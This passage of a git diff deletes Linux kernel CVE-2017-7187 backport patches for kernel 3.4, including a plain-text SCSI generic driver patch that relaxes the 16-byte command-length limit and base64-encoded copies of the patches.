ogCiAJc3JwLT5ycSA9IHJxOwogCXJxLT5lbmRfaW9fZGF0YSA9IHNycDsKZGlmZiAtLWdpdCBhL2RyaXZlcnMvc2NzaS9zdC5jIGIvZHJpdmVycy9zY3NpL3N0LmMKaW5kZXggZTQxOTk4Yy4uMDhhZDUzMCAxMDA2NDQKLS0tIGEvZHJpdmVycy9zY3NpL3N0LmMKKysrIGIvZHJpdmVycy9zY3NpL3N0LmMKQEAgLTQ4OCw3ICs0ODgsNyBAQAogCWlmICghcmVxKQogCQlyZXR1cm4gRFJJVkVSX0VSUk9SIDw8IDI0OwogCi0JcmVxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOworCWJsa19ycV9zZXRfYmxvY2tfcGMocmVxKTsKIAlyZXEtPmNtZF9mbGFncyB8PSBSRVFfUVVJRVQ7CiAKIAltZGF0YS0+bnVsbF9tYXBwZWQgPSAxOwpkaWZmIC0tZ2l0IGEvZHJpdmVycy90YXJnZXQvdGFyZ2V0X2NvcmVfcHNjc2kuYyBiL2RyaXZlcnMvdGFyZ2V0L3RhcmdldF9jb3JlX3BzY3NpLmMKaW5kZXggOTRjOTA1Zi4uZDI4ZjhkMSAxMDA2NDQKLS0tIGEvZHJpdmVycy90YXJnZXQvdGFyZ2V0X2NvcmVfcHNjc2kuYworKysgYi9kcml2ZXJzL3RhcmdldC90YXJnZXRfY29yZV9wc2NzaS5jCkBAIC0xMDgzLDYgKzEwODMsOCBAQAogCQkJCVRDTV9MT0dJQ0FMX1VOSVRfQ09NTVVOSUNBVElPTl9GQUlMVVJFOwogCQkJcmV0dXJuIC1FTk9ERVY7CiAJCX0KKworCQlibGtfcnFfc2V0X2Jsb2NrX3BjKHJlcSk7CiAJfSBlbHNlIHsKIAkJQlVHX09OKCF0YXNrLT50YXNrX3NpemUpOwogCkBAIC0xMTA0LDcgKzExMDYsNiBAQAogCQl9CiAJfQogCi0JcmVxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCXJlcS0+ZW5kX2lvID0gcHNjc2lfcmVxX2RvbmU7CiAJcmVxLT5lbmRfaW9fZGF0YSA9IHRhc2s7CiAJcmVxLT5jbWRfbGVuID0gc2NzaV9jb21tYW5kX3NpemUocHQtPnBzY3NpX2NkYik7CmRpZmYgLS1naXQgYS9pbmNsdWRlL2xpbnV4L2Jsa2Rldi5oIGIvaW5jbHVkZS9saW51eC9ibGtkZXYuaAppbmRleCAyMWRjMmFhLi5mMzdkMWYwIDEwMDY0NAotLS0gYS9pbmNsdWRlL2xpbnV4L2Jsa2Rldi5oCisrKyBiL2luY2x1ZGUvbGludXgvYmxrZGV2LmgKQEAgLTY3NSw2ICs2NzUsNyBAQAogZXh0ZXJuIHN0cnVjdCByZXF1ZXN0ICpibGtfZ2V0X3JlcXVlc3Qoc3RydWN0IHJlcXVlc3RfcXVldWUgKiwgaW50LCBnZnBfdCk7CiBleHRlcm4gc3RydWN0IHJlcXVlc3QgKmJsa19tYWtlX3JlcXVlc3Qoc3RydWN0IHJlcXVlc3RfcXVldWUgKiwgc3RydWN0IGJpbyAqLAogCQkJCQlnZnBfdCk7CitleHRlcm4gdm9pZCBibGtfcnFfc2V0X2Jsb2NrX3BjKHN0cnVjdCByZXF1ZXN0ICopOwogZXh0ZXJuIHZvaWQgYmxrX3JlcXVldWVfcmVxdWVzdChzdHJ1Y3QgcmVxdWVzdF9xdWV1ZSAqLCBzdHJ1Y3QgcmVxdWVzdCAqKTsKIGV4dGVybiBpbnQgYmxrX3JlaW5zZXJ0X3JlcXVlc3Qoc3RydWN0IHJlcXVlc3RfcXVldWUgKnEsIHN0cnVjdCByZXF1ZXN0ICpycSk7CiBleHRlcm4gYm9vbCBibGtfcmVpbnNlcnRfcmVxX3N1cChzdHJ1Y3QgcmVxdWVzdF9xdWV1ZSAqcSk7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-7187/3.4/0002.patch
deleted file mode 100644
index b9a7bd36..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0002.patch
+++ /dev/null
@@ -1,263 +0,0 @@
-From 8093bf02878aa659cfcf8cbfc272b2ad45eef24f Mon Sep 17 00:00:00 2001
-From: Douglas Gilbert <dgilbert@interlog.com>
-Date: Tue, 03 Jun 2014 13:18:18 -0400
-Subject: [PATCH] BACKPORT: sg: relax 16 byte cdb restriction
-
- - remove the 16 byte CDB (SCSI command) length limit from the sg driver
-   by handling longer CDBs the same way as the bsg driver. Remove comment
-   from sg.h public interface about the cmd_len field being limited to 16
-   bytes.
- - remove some dead code caused by this change
- - cleanup comment block at the top of sg.h, fix urls
-
-Change-Id: Ie8150e5375b3316d5d5206f079c4a50f1c50b755
-Signed-off-by: Douglas Gilbert <dgilbert@interlog.com>
-Reviewed-by: Mike Christie <michaelc@cs.wisc.edu>
-Reviewed-by: Hannes Reinecke <hare@suse.de>
-Signed-off-by: Christoph Hellwig <hch@lst.de>
----
-
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index 216d31f..56178bc 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -7,9 +7,7 @@
-  * Original driver (sg.c):
-  *        Copyright (C) 1992 Lawrence Foard
-  * Version 2 and 3 extensions to driver:
-- *        Copyright (C) 1998 - 2005 Douglas Gilbert
-- *
-- *  Modified  19-JAN-1998  Richard Gooch <rgooch@atnf.csiro.au>  Devfs support
-+ *        Copyright (C) 1998 - 2014 Douglas Gilbert
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License as published by
-@@ -18,11 +16,11 @@
-  *
-  */
- 
--static int sg_version_num = 30534;	/* 2 digits for each component */
--#define SG_VERSION_STR "3.5.34"
-+static int sg_version_num = 30536;	/* 2 digits for each component */
-+#define SG_VERSION_STR "3.5.36"
- 
- /*
-- *  D. P. Gilbert (dgilbert@interlog.com, dougg@triode.net.au), notes:
-+ *  D. P. Gilbert (dgilbert@interlog.com), notes:
-  *      - scsi logging is available via SCSI_LOG_TIMEOUT macros. First
-  *        the kernel/module needs to be built with CONFIG_SCSI_LOGGING
-  *        (otherwise the macros compile to empty statements).
-@@ -63,7 +61,7 @@
- 
- #ifdef CONFIG_SCSI_PROC_FS
- #include <linux/proc_fs.h>
--static char *sg_version_date = "20061027";
-+static char *sg_version_date = "20140603";
- 
- static int sg_proc_init(void);
- static void sg_proc_cleanup(void);
-@@ -72,6 +70,12 @@
- #define SG_ALLOW_DIO_DEF 0
- 
- #define SG_MAX_DEVS 32768
-+
-+/* SG_MAX_CDB_SIZE should be 260 (spc4r37 section 3.1.30) however the type
-+ * of sg_io_hdr::cmd_len can only represent 255. All SCSI commands greater
-+ * than 16 bytes are "variable length" whose length is a multiple of 4
-+ */
-+#define SG_MAX_CDB_SIZE 252
- 
- /*
-  * Suppose you want to calculate the formula muldiv(x,m,d)=int(x * m / d)
-@@ -159,7 +163,7 @@
- 	char force_packid;	/* 1 -> pack_id input to read(), 0 -> ignored */
- 	volatile char closed;	/* 1 -> fd closed but request(s) outstanding */
- 	char cmd_q;		/* 1 -> allow command queuing, 0 -> don't */
--	char next_cmd_len;	/* 0 -> automatic (def), >0 -> use on next write() */
-+	unsigned char next_cmd_len; /* 0: automatic, >0: use on next write() */
- 	char keep_orphan;	/* 0 -> drop orphan (def), 1 -> keep for read() */
- 	char mmap_called;	/* 0 -> mmap() never called on this fd */
- 	struct kref f_ref;
-@@ -542,7 +546,7 @@
- 	Sg_request *srp;
- 	struct sg_header old_hdr;
- 	sg_io_hdr_t *hp;
--	unsigned char cmnd[MAX_COMMAND_SIZE];
-+	unsigned char cmnd[SG_MAX_CDB_SIZE];
- 
- 	if (unlikely(segment_eq(get_fs(), KERNEL_DS)))
- 		return -EINVAL;
-@@ -577,12 +581,6 @@
- 	buf += SZ_SG_HEADER;
- 	__get_user(opcode, buf);
- 	if (sfp->next_cmd_len > 0) {
--		if (sfp->next_cmd_len > MAX_COMMAND_SIZE) {
--			SCSI_LOG_TIMEOUT(1, printk("sg_write: command length too long\n"));
--			sfp->next_cmd_len = 0;
--			sg_remove_request(sfp, srp);
--			return -EIO;
--		}
- 		cmd_size = sfp->next_cmd_len;
- 		sfp->next_cmd_len = 0;	/* reset so only this write() effected */
- 	} else {
-@@ -654,7 +652,7 @@
- 	int k;
- 	Sg_request *srp;
- 	sg_io_hdr_t *hp;
--	unsigned char cmnd[MAX_COMMAND_SIZE];
-+	unsigned char cmnd[SG_MAX_CDB_SIZE];
- 	int timeout;
- 	unsigned long ul_timeout;
- 
-@@ -1647,15 +1645,27 @@
- 	struct request_queue *q = sfp->parentdp->device->request_queue;
- 	struct rq_map_data *md, map_data;
- 	int rw = hp->dxfer_direction == SG_DXFER_TO_DEV ? WRITE : READ;
-+	unsigned char *long_cmdp = NULL;
- 
- 	SCSI_LOG_TIMEOUT(4, printk(KERN_INFO "sg_start_req: dxfer_len=%d\n",
- 				   dxfer_len));
- 
-+	if (hp->cmd_len > BLK_MAX_CDB) {
-+		long_cmdp = kzalloc(hp->cmd_len, GFP_KERNEL);
-+		if (!long_cmdp)
-+			return -ENOMEM;
-+	}
-+
- 	rq = blk_get_request(q, rw, GFP_ATOMIC);
--	if (!rq)
-+	if (!rq) {
-+		kfree(long_cmdp);
- 		return -ENOMEM;
-+	}
- 
- 	blk_rq_set_block_pc(rq);
-+
-+	if (hp->cmd_len > BLK_MAX_CDB)
-+		rq->cmd = long_cmdp;
- 	memcpy(rq->cmd, cmd, hp->cmd_len);
- 	rq->cmd_len = hp->cmd_len;
- 
-@@ -1740,6 +1750,8 @@
- 		if (srp->bio)
- 			ret = blk_rq_unmap_user(srp->bio);
- 
-+		if (srp->rq->cmd != srp->rq->__cmd)
-+			kfree(srp->rq->cmd);
- 		blk_put_request(srp->rq);
- 	}
- 
-diff --git a/include/scsi/sg.h b/include/scsi/sg.h
-index a9f3c6f..d8c0c43 100644
---- a/include/scsi/sg.h
-+++ b/include/scsi/sg.h
-@@ -4,77 +4,34 @@
- #include <linux/compiler.h>
- 
- /*
--   History:
--    Started: Aug 9 by Lawrence Foard (entropy@world.std.com), to allow user
--     process control of SCSI devices.
--    Development Sponsored by Killy Corp. NY NY
--Original driver (sg.h):
--*       Copyright (C) 1992 Lawrence Foard
--Version 2 and 3 extensions to driver:
--*       Copyright (C) 1998 - 2006 Douglas Gilbert
--
--    Version: 3.5.34 (20060920)
--    This version is for 2.6 series kernels.
--
--    For a full changelog see http://www.torque.net/sg
--
--Map of SG verions to the Linux kernels in which they appear:
--       ----------        ----------------------------------
--       original          all kernels < 2.2.6
--       2.1.40            2.2.20
--       3.0.x             optional version 3 sg driver for 2.2 series
--       3.1.17++          2.4.0++
--       3.5.30++          2.6.0++
--
--Major new features in SG 3.x driver (cf SG 2.x drivers)
--	- SG_IO ioctl() combines function if write() and read()
--	- new interface (sg_io_hdr_t) but still supports old interface
--	- scatter/gather in user space, direct IO, and mmap supported
--
-- The normal action of this driver is to use the adapter (HBA) driver to DMA
-- data into kernel buffers and then use the CPU to copy the data into the 
-- user space (vice versa for writes). That is called "indirect" IO due to 
-- the double handling of data. There are two methods offered to remove the
-- redundant copy: 1) direct IO and 2) using the mmap() system call to map
-- the reserve buffer (this driver has one reserve buffer per fd) into the
-- user space. Both have their advantages.
-- In terms of absolute speed mmap() is faster. If speed is not a concern, 
-- indirect IO should be fine. Read the documentation for more information.
--
-- ** N.B. To use direct IO 'echo 1 > /proc/scsi/sg/allow_dio' or
--         'echo 1 > /sys/module/sg/parameters/allow_dio' is needed.
--         That attribute is 0 by default. **
-- 
-- Historical note: this SCSI pass-through driver has been known as "sg" for 
-- a decade. In broader kernel discussions "sg" is used to refer to scatter
-- gather techniques. The context should clarify which "sg" is referred to.
--
-- Documentation
-- =============
-- A web site for the SG device driver can be found at:
--	http://www.torque.net/sg  [alternatively check the MAINTAINERS file]
-- The documentation for the sg version 3 driver can be found at:
-- 	http://www.torque.net/sg/p/sg_v3_ho.html
-- This is a rendering from DocBook source [change the extension to "sgml"
-- or "xml"]. There are renderings in "ps", "pdf", "rtf" and "txt" (soon).
-- The SG_IO ioctl is now found in other parts kernel (e.g. the block layer).
-- For more information see http://www.torque.net/sg/sg_io.html
--
-- The older, version 2 documents discuss the original sg interface in detail:
--	http://www.torque.net/sg/p/scsi-generic.txt
--	http://www.torque.net/sg/p/scsi-generic_long.txt
-- Also available: <kernel_source>/Documentation/scsi/scsi-generic.txt
--
-- Utility and test programs are available at the sg web site. They are 
-- packaged as sg3_utils (for the lk 2.4 and 2.6 series) and sg_utils
-- (for the lk 2.2 series).
--*/
-+ * History:
-+ *  Started: Aug 9 by Lawrence Foard (entropy@world.std.com), to allow user
-+ *   process control of SCSI devices.
-+ *  Development Sponsored by Killy Corp. NY NY
-+ *
-+ * Original driver (sg.h):
-+ *       Copyright (C) 1992 Lawrence Foard
-+ * Version 2 and 3 extensions to driver:
-+ *	Copyright (C) 1998 - 2014 Douglas Gilbert
-+ *
-+ *  Version: 3.5.36 (20140603)
-+ *  This version is for 2.6 and 3 series kernels.
-+ *
-+ * Documentation
-+ * =============
-+ * A web site for the SG device driver can be found at:
-+ *	http://sg.danny.cz/sg  [alternatively check the MAINTAINERS file]
-+ * The documentation for the sg version 3 driver can be found at:
-+ *	http://sg.danny.cz/sg/p/sg_v3_ho.html
-+ * Also see: <kernel_source>/Documentation/scsi/scsi-generic.txt
-+ *
-+ * For utility and test programs see: http://sg.danny.cz/sg/sg3_utils.html
-+ */
- 
- #ifdef __KERNEL__
- extern int sg_big_buff; /* for sysctl */
- #endif
- 
--/* New interface introduced in the 3.x SG drivers follows */
- 
- typedef struct sg_iovec /* same structure as used by readv() Linux system */
- {                       /* call. It defines one scatter-gather element. */
-@@ -87,7 +44,7 @@
- {
-     int interface_id;           /* [i] 'S' for SCSI generic (required) */
-     int dxfer_direction;        /* [i] data transfer direction  */
--    unsigned char cmd_len;      /* [i] SCSI command length ( <= 16 bytes) */
-+    unsigned char cmd_len;      /* [i] SCSI command length */
-     unsigned char mx_sb_len;    /* [i] max length to write to sbp */
-     unsigned short iovec_count; /* [i] 0 implies no scatter gather */
-     unsigned int dxfer_len;     /* [i] byte count of data transfer */
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7187/3.4/0002.patch.base64
deleted file mode 100644
index 6ff090c2..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA4MDkzYmYwMjg3OGFhNjU5Y2ZjZjhjYmZjMjcyYjJhZDQ1ZWVmMjRmIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBEb3VnbGFzIEdpbGJlcnQgPGRnaWxiZXJ0QGludGVybG9nLmNvbT4KRGF0ZTogVHVlLCAwMyBKdW4gMjAxNCAxMzoxODoxOCAtMDQwMApTdWJqZWN0OiBbUEFUQ0hdIEJBQ0tQT1JUOiBzZzogcmVsYXggMTYgYnl0ZSBjZGIgcmVzdHJpY3Rpb24KCiAtIHJlbW92ZSB0aGUgMTYgYnl0ZSBDREIgKFNDU0kgY29tbWFuZCkgbGVuZ3RoIGxpbWl0IGZyb20gdGhlIHNnIGRyaXZlcgogICBieSBoYW5kbGluZyBsb25nZXIgQ0RCcyB0aGUgc2FtZSB3YXkgYXMgdGhlIGJzZyBkcml2ZXIuIFJlbW92ZSBjb21tZW50CiAgIGZyb20gc2cuaCBwdWJsaWMgaW50ZXJmYWNlIGFib3V0IHRoZSBjbWRfbGVuIGZpZWxkIGJlaW5nIGxpbWl0ZWQgdG8gMTYKICAgYnl0ZXMuCiAtIHJlbW92ZSBzb21lIGRlYWQgY29kZSBjYXVzZWQgYnkgdGhpcyBjaGFuZ2UKIC0gY2xlYW51cCBjb21tZW50IGJsb2NrIGF0IHRoZSB0b3Agb2Ygc2cuaCwgZml4IHVybHMKCkNoYW5nZS1JZDogSWU4MTUwZTUzNzViMzMxNmQ1ZDUyMDZmMDc5YzRhNTBmMWM1MGI3NTUKU2lnbmVkLW9mZi1ieTogRG91Z2xhcyBHaWxiZXJ0IDxkZ2lsYmVydEBpbnRlcmxvZy5jb20+ClJldmlld2VkLWJ5OiBNaWtlIENocmlzdGllIDxtaWNoYWVsY0Bjcy53aXNjLmVkdT4KUmV2aWV3ZWQtYnk6IEhhbm5lcyBSZWluZWNrZSA8aGFyZUBzdXNlLmRlPgpTaWduZWQtb2ZmLWJ5OiBDaHJpc3RvcGggSGVsbHdpZyA8aGNoQGxzdC5kZT4KLS0tCgpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL3NnLmMgYi9kcml2ZXJzL3Njc2kvc2cuYwppbmRleCAyMTZkMzFmLi41NjE3OGJjIDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvc2cuYworKysgYi9kcml2ZXJzL3Njc2kvc2cuYwpAQCAtNyw5ICs3LDcgQEAKICAqIE9yaWdpbmFsIGRyaXZlciAoc2cuYyk6CiAgKiAgICAgICAgQ29weXJpZ2h0IChDKSAxOTkyIExhd3JlbmNlIEZvYXJkCiAgKiBWZXJzaW9uIDIgYW5kIDMgZXh0ZW5zaW9ucyB0byBkcml2ZXI6Ci0gKiAgICAgICAgQ29weXJpZ2h0IChDKSAxOTk4IC0gMjAwNSBEb3VnbGFzIEdpbGJlcnQKLSAqCi0gKiAgTW9kaWZpZWQgIDE5LUpBTi0xOTk4ICBSaWNoYXJkIEdvb2NoIDxyZ29vY2hAYXRuZi5jc2lyby5hdT4gIERldmZzIHN1cHBvcnQKKyAqICAgICAgICBDb3B5cmlnaHQgKEMpIDE5OTggLSAyMDE0IERvdWdsYXMgR2lsYmVydAogICoKICAqIFRoaXMgcHJvZ3JhbSBpcyBmcmVlIHNvZnR3YXJlOyB5b3UgY2FuIHJlZGlzdHJpYnV0ZSBpdCBhbmQvb3IgbW9kaWZ5CiAgKiBpdCB1bmRlciB0aGUgdGVybXMgb2YgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlIGFzIHB1Ymxpc2hlZCBieQpAQCAtMTgsMTEgKzE2LDExIEBACiAgKgogICovCiAKLXN0YXRpYyBpbnQgc2dfdmVyc2lvbl9udW0gPSAzMDUzNDsJLyogMiBkaWdpdHMgZm9yIGVhY2ggY29tcG9uZW50ICovCi0jZGVmaW5lIFNHX1ZFUlNJT05fU1RSICIzLjUuMzQiCitzdGF0aWMgaW50IHNnX3ZlcnNpb25fbnVtID0gMzA1MzY7CS8qIDIgZGlnaXRzIGZvciBlYWNoIGNvbXBvbmVudCAqLworI2RlZmluZSBTR19WRVJTSU9OX1NUUiAiMy41LjM2IgogCiAvKgotICogIEQuIFAuIEdpbGJlcnQgKGRnaWxiZXJ0QGludGVybG9nLmNvbSwgZG91Z2dAdHJpb2RlLm5ldC5hdSksIG5vdGVzOgorICogIEQuIFAuIEdpbGJlcnQgKGRnaWxiZXJ0QGludGVybG9nLmNvbSksIG5vdGVzOgogICogICAgICAtIHNjc2kgbG9nZ2luZyBpcyBhdmFpbGFibGUgdmlhIFNDU0lfTE9HX1RJTUVPVVQgbWFjcm9zLiBGaXJzdAogICogICAgICAgIHRoZSBrZXJuZWwvbW9kdWxlIG5lZWRzIHRvIGJlIGJ1aWx0IHdpdGggQ09ORklHX1NDU0lfTE9HR0lORwogICogICAgICAgIChvdGhlcndpc2UgdGhlIG1hY3JvcyBjb21waWxlIHRvIGVtcHR5IHN0YXRlbWVudHMpLgpAQCAtNjMsNyArNjEsNyBAQAogCiAjaWZkZWYgQ09ORklHX1NDU0lfUFJPQ19GUwogI2luY2x1ZGUgPGxpbnV4L3Byb2NfZnMuaD4KLXN0YXRpYyBjaGFyICpzZ192ZXJzaW9uX2RhdGUgPSAiMjAwNjEwMjciOworc3RhdGljIGNoYXIgKnNnX3ZlcnNpb25fZGF0ZSA9ICIyMDE0MDYwMyI7CiAKIHN0YXRpYyBpbnQgc2dfcHJvY19pbml0KHZvaWQpOwogc3RhdGljIHZvaWQgc2dfcHJvY19jbGVhbnVwKHZvaWQpOwpAQCAtNzIsNiArNzAsMTIgQEAKICNkZWZpbmUgU0dfQUxMT1dfRElPX0RFRiAwCiAKICNkZWZpbmUgU0dfTUFYX0RFVlMgMzI3NjgKKworLyogU0dfTUFYX0NEQl9TSVpFIHNob3VsZCBiZSAyNjAgKHNwYzRyMzcgc2VjdGlvbiAzLjEuMzApIGhvd2V2ZXIgdGhlIHR5cGUKKyAqIG9mIHNnX2lvX2hkcjo6Y21kX2xlbiBjYW4gb25seSByZXByZXNlbnQgMjU1LiBBbGwgU0NTSSBjb21tYW5kcyBncmVhdGVyCisgKiB0aGFuIDE2IGJ5dGVzIGFyZSAidmFyaWFibGUgbGVuZ3RoIiB3aG9zZSBsZW5ndGggaXMgYSBtdWx0aXBsZSBvZiA0CisgKi8KKyNkZWZpbmUgU0dfTUFYX0NEQl9TSVpFIDI1MgogCiAvKgogICogU3VwcG9zZSB5b3Ugd2FudCB0byBjYWxjdWxhdGUgdGhlIGZvcm11bGEgbXVsZGl2KHgsbSxkKT1pbnQoeCAqIG0gLyBkKQpAQCAtMTU5LDcgKzE2Myw3IEBACiAJY2hhciBmb3JjZV9wYWNraWQ7CS8qIDEgLT4gcGFja19pZCBpbnB1dCB0byByZWFkKCksIDAgLT4gaWdub3JlZCAqLwogCXZvbGF0aWxlIGNoYXIgY2xvc2VkOwkvKiAxIC0+IGZkIGNsb3NlZCBidXQgcmVxdWVzdChzKSBvdXRzdGFuZGluZyAqLwogCWNoYXIgY21kX3E7CQkvKiAxIC0+IGFsbG93IGNvbW1hbmQgcXVldWluZywgMCAtPiBkb24ndCAqLwotCWNoYXIgbmV4dF9jbWRfbGVuOwkvKiAwIC0+IGF1dG9tYXRpYyAoZGVmKSwgPjAgLT4gdXNlIG9uIG5leHQgd3JpdGUoKSAqLworCXVuc2lnbmVkIGNoYXIgbmV4dF9jbWRfbGVuOyAvKiAwOiBhdXRvbWF0aWMsID4wOiB1c2Ugb24gbmV4dCB3cml0ZSgpICovCiAJY2hhciBrZWVwX29ycGhhbjsJLyogMCAtPiBkcm9wIG9ycGhhbiAoZGVmKSwgMSAtPiBrZWVwIGZvciByZWFkKCkgKi8KIAljaGFyIG1tYXBfY2FsbGVkOwkvKiAwIC0+IG1tYXAoKSBuZXZlciBjYWxsZWQgb24gdGhpcyBmZCAqLwogCXN0cnVjdCBrcmVmIGZfcmVmOwpAQCAtNTQyLDcgKzU0Niw3IEBACiAJU2dfcmVxdWVzdCAqc3JwOwogCXN0cnVjdCBzZ19oZWFkZXIgb2xkX2hkcjsKIAlzZ19pb19oZHJfdCAqaHA7Ci0JdW5zaWduZWQgY2hhciBjbW5kW01BWF9DT01NQU5EX1NJWkVdOworCXVuc2lnbmVkIGNoYXIgY21uZFtTR19NQVhfQ0RCX1NJWkVdOwogCiAJaWYgKHVubGlrZWx5KHNlZ21lbnRfZXEoZ2V0X2ZzKCksIEtFUk5FTF9EUykpKQogCQlyZXR1cm4gLUVJTlZBTDsKQEAgLTU3NywxMiArNTgxLDYgQEAKIAlidWYgKz0gU1pfU0dfSEVBREVSOwogCV9fZ2V0X3VzZXIob3Bjb2RlLCBidWYpOwogCWlmIChzZnAtPm5leHRfY21kX2xlbiA+IDApIHsKLQkJaWYgKHNmcC0+bmV4dF9jbWRfbGVuID4gTUFYX0NPTU1BTkRfU0laRSkgewotCQkJU0NTSV9MT0dfVElNRU9VVCgxLCBwcmludGsoInNnX3dyaXRlOiBjb21tYW5kIGxlbmd0aCB0b28gbG9uZ1xuIikpOwotCQkJc2ZwLT5uZXh0X2NtZF9sZW4gPSAwOwotCQkJc2dfcmVtb3ZlX3JlcXVlc3Qoc2ZwLCBzcnApOwotCQkJcmV0dXJuIC1FSU87Ci0JCX0KIAkJY21kX3NpemUgPSBzZnAtPm5leHRfY21kX2xlbjsKIAkJc2ZwLT5uZXh0X2NtZF9sZW4gPSAwOwkvKiByZXNldCBzbyBvbmx5IHRoaXMgd3JpdGUoKSBlZmZlY3RlZCAqLwogCX0gZWxzZSB7CkBAIC02NTQsNyArNjUyLDcgQEAKIAlpbnQgazsKIAlTZ19yZXF1ZXN0ICpzcnA7CiAJc2dfaW9faGRyX3QgKmhwOwotCXVuc2lnbmVkIGNoYXIgY21uZFtNQVhfQ09NTUFORF9TSVpFXTsKKwl1bnNpZ25lZCBjaGFyIGNtbmRbU0dfTUFYX0NEQl9TSVpFXTsKIAlpbnQgdGltZW91dDsKIAl1bnNpZ25lZCBsb25nIHVsX3RpbWVvdXQ7CiAKQEAgLTE2NDcsMTUgKzE2NDUsMjcgQEAKIAlzdHJ1Y3QgcmVxdWVzdF9xdWV1ZSAqcSA9IHNmcC0+cGFyZW50ZHAtPmRldmljZS0+cmVxdWVzdF9xdWV1ZTsKIAlzdHJ1Y3QgcnFfbWFwX2RhdGEgKm1kLCBtYXBfZGF0YTsKIAlpbnQgcncgPSBocC0+ZHhmZXJfZGlyZWN0aW9uID09IFNHX0RYRkVSX1RPX0RFViA/IFdSSVRFIDogUkVBRDsKKwl1bnNpZ25lZCBjaGFyICpsb25nX2NtZHAgPSBOVUxMOwogCiAJU0NTSV9MT0dfVElNRU9VVCg0LCBwcmludGsoS0VSTl9JTkZPICJzZ19zdGFydF9yZXE6IGR4ZmVyX2xlbj0lZFxuIiwKIAkJCQkgICBkeGZlcl9sZW4pKTsKIAorCWlmIChocC0+Y21kX2xlbiA+IEJMS19NQVhfQ0RCKSB7CisJCWxvbmdfY21kcCA9IGt6YWxsb2MoaHAtPmNtZF9sZW4sIEdGUF9LRVJORUwpOworCQlpZiAoIWxvbmdfY21kcCkKKwkJCXJldHVybiAtRU5PTUVNOworCX0KKwogCXJxID0gYmxrX2dldF9yZXF1ZXN0KHEsIHJ3LCBHRlBfQVRPTUlDKTsKLQlpZiAoIXJxKQorCWlmICghcnEpIHsKKwkJa2ZyZWUobG9uZ19jbWRwKTsKIAkJcmV0dXJuIC1FTk9NRU07CisJfQogCiAJYmxrX3JxX3NldF9ibG9ja19wYyhycSk7CisKKwlpZiAoaHAtPmNtZF9sZW4gPiBCTEtfTUFYX0NEQikKKwkJcnEtPmNtZCA9IGxvbmdfY21kcDsKIAltZW1jcHkocnEtPmNtZCwgY21kLCBocC0+Y21kX2xlbik7CiAJcnEtPmNtZF9sZW4gPSBocC0+Y21kX2xlbjsKIApAQCAtMTc0MCw2ICsxNzUwLDggQEAKIAkJaWYgKHNycC0+YmlvKQogCQkJcmV0ID0gYmxrX3JxX3VubWFwX3VzZXIoc3JwLT5iaW8pOwogCisJCWlmIChzcnAtPnJxLT5jbWQgIT0gc3JwLT5ycS0+X19jbWQpCisJCQlrZnJlZShzcnAtPnJxLT5jbWQpOwogCQlibGtfcHV0X3JlcXVlc3Qoc3JwLT5ycSk7CiAJfQogCmRpZmYgLS1naXQgYS9pbmNsdWRlL3Njc2kvc2cuaCBiL2luY2x1ZGUvc2NzaS9zZy5oCmluZGV4IGE5ZjNjNmYuLmQ4YzBjNDMgMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvc2NzaS9zZy5oCisrKyBiL2luY2x1ZGUvc2NzaS9zZy5oCkBAIC00LDc3ICs0LDM0IEBACiAjaW5jbHVkZSA8bGludXgvY29tcGlsZXIuaD4KIAogLyoKLSAgIEhpc3Rvcnk6Ci0gICAgU3RhcnRlZDogQXVnIDkgYnkgTGF3cmVuY2UgRm9hcmQgKGVudHJvcHlAd29ybGQuc3RkLmNvbSksIHRvIGFsbG93IHVzZXIKLSAgICAgcHJvY2VzcyBjb250cm9sIG9mIFNDU0kgZGV2aWNlcy4KLSAgICBEZXZlbG9wbWVudCBTcG9uc29yZWQgYnkgS2lsbHkgQ29ycC4gTlkgTlkKLU9yaWdpbmFsIGRyaXZlciAoc2cuaCk6Ci0qICAgICAgIENvcHlyaWdodCAoQykgMTk5MiBMYXdyZW5jZSBGb2FyZAotVmVyc2lvbiAyIGFuZCAzIGV4dGVuc2lvbnMgdG8gZHJpdmVyOgotKiAgICAgICBDb3B5cmlnaHQgKEMpIDE5OTggLSAyMDA2IERvdWdsYXMgR2lsYmVydAotCi0gICAgVmVyc2lvbjogMy41LjM0ICgyMDA2MDkyMCkKLSAgICBUaGlzIHZlcnNpb24gaXMgZm9yIDIuNiBzZXJpZXMga2VybmVscy4KLQotICAgIEZvciBhIGZ1bGwgY2hhbmdlbG9nIHNlZSBodHRwOi8vd3d3LnRvcnF1ZS5uZXQvc2cKLQotTWFwIG9mIFNHIHZlcmlvbnMgdG8gdGhlIExpbnV4IGtlcm5lbHMgaW4gd2hpY2ggdGhleSBhcHBlYXI6Ci0gICAgICAgLS0tLS0tLS0tLSAgICAgICAgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQotICAgICAgIG9yaWdpbmFsICAgICAgICAgIGFsbCBrZXJuZWxzIDwgMi4yLjYKLSAgICAgICAyLjEuNDAgICAgICAgICAgICAyLjIuMjAKLSAgICAgICAzLjAueCAgICAgICAgICAgICBvcHRpb25hbCB2ZXJzaW9uIDMgc2cgZHJpdmVyIGZvciAyLjIgc2VyaWVzCi0gICAgICAgMy4xLjE3KysgICAgICAgICAgMi40LjArKwotICAgICAgIDMuNS4zMCsrICAgICAgICAgIDIuNi4wKysKLQotTWFqb3IgbmV3IGZlYXR1cmVzIGluIFNHIDMueCBkcml2ZXIgKGNmIFNHIDIueCBkcml2ZXJzKQotCS0gU0dfSU8gaW9jdGwoKSBjb21